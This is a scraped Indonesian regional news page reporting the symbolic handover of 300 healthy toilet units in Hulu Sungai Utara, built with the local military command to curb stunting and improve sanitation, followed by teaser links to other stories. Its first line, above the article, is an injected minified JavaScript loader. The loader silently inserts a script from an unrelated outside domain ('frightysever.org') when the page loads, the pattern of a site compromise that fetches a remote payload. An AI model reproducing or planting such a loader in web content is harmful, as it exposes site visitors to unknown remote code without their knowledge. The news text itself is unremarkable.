(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
KANALKALIMANTAN.COM, AMUNTAI – Sebanyak 300 unit Water Closet (WC) Sehat siap dibangun untuk warga di Kabupaten Hulu Sungai Utara (HSU) melalui Dinas Kesehatan Kabupaten HSU.
Dibantu Kodim 1001/ HSU-Balangan melalui program “Karya Bakti TNI” pembangunan WC Sehat ini sebagai upaya untuk pencegahan stunting, meningkatkan kualitas sanitasi dan mendorong pola hidup sehat bagi masyarakat.
Bantuan WC Sehat ditandai dengan penyerahan secara simbolis oleh Penjabat (Pj) Bupati HSU Zakly Asswan kepada Komandan Kodim 1001/HSU-Balangan Letkol Kav Gunantyo Ady Wiryawan saat berada di Desa Pulau Damar Kecamatan Banjang, Selasa (15/10/2024) siang.
Pj Bupati HSU Zakly Asswan menyambut baik dan memberikan apresiasi kepada Dinas Kesehatan Kabupaten HSU serta dukungan Kodim 1001/HSU-Balangan yang telah membangun WC Sehat bagi warga yang tidak memiliki sanitasi layak di beberapa desa di Kabupaten HSU.
Baca juga: Tiga Terdakwa Kasus Korupsi Proyek Jamban Sehat HSU Disidang
“Alhamdulillah dibantu Dandim yang selalu bersemangat untuk membantu rakyat bersama-sama pemerintah,” kata Zakly.
Lebih lanjut, dia berharap bantuan WC Sehat bagi warga ini akan mendorong pola hidup sehat bagi masyarakat.
Seiring dengan itu, Komandan Kodim 1001/HSU-Balangan, Letkol Kav Gunantyo Ady Wiryawan, menyampaikan ucapan terima kasih kepada Pemkab HSU terutama dalam bantuan WC Sehat ini.
Baca juga: KPK Serahkan Barang Milik Negara ke Pemkab HSU Senilai Rp16,2 Miliar
“Melalui kegiatan Karya Bakti TNI Pembangunan WC Sehat ini, kami selalu siap melaksanakan tugas, bersinergi dengan pemerintah daerah, kita siap mendukung dalam rangka kegiatan percepatan pembangunan,” tegas Dandim.
Sebelumnya, kata Dandim, pihaknya bersama Dinas Kesehatan Kabupaten HSU telah meninjau beberapa warga yang layak mendapatkan bantuan WC Sehat.
“Kita berharap adanya bantuan WC Sehat ini, warga tidak ada yang membuang hajat disembarang tempat seperti di sungai, dan adanya WC Sehat ini kita ajari anak-anak kita untuk hidup sehat,” imbuhnya.
Baca juga: Ketua TKD Prabowo-Gibran Kalsel Sulaiman Umar Digadang Masuk Kabinet
Diketahui, 300 unit bantuan WC Sehat bagi warga di Kabupaten HSU salah satunya 62 unit bantuan berada di Kecamatan Banjang. (Kanalkalimantan.com/dew)
Reporter : dew
Editor : bie
KANALKALIMANTAN.COM, BANJARMASIN — Masyarakat di Kota Banjarmasin sangat terpukul dengan kebijakan penonaktifan massal kepesertaan BPJS… Read More
KANALKALIMANTAN.COM, BANJARMASIN — Wali Kota Banjarmasin, H Muhammad Yamin HR menyoroti bangunan yang berdiri di… Read More
KANALKALIMANTAN.COM, BANJARMASIN - Membuka tahun 2026, Masyarakat Anti Fitnah Indonesia (MAFINDO) Kalimantan Selatan (Kalsel) menggelar… Read More
Saat ini Ada 17 Situs Geologi Utama, 50 Titik Potensial Masih Dikaji Read More
KANALKALIMANTAN.COM, BANJARMASIN – Sudah lama para skater menanti kehadiran skatepark di Kota Banjarmasin. Pasalnya, Siring… Read More
KANALKALIMANTAN.COM, BANJARBARU - Komisi III Dewan Perwakilan Rakyat Daerah (DPRD) Kota Banjarbaru turun melakukan pengecekan… Read More
This website uses cookies.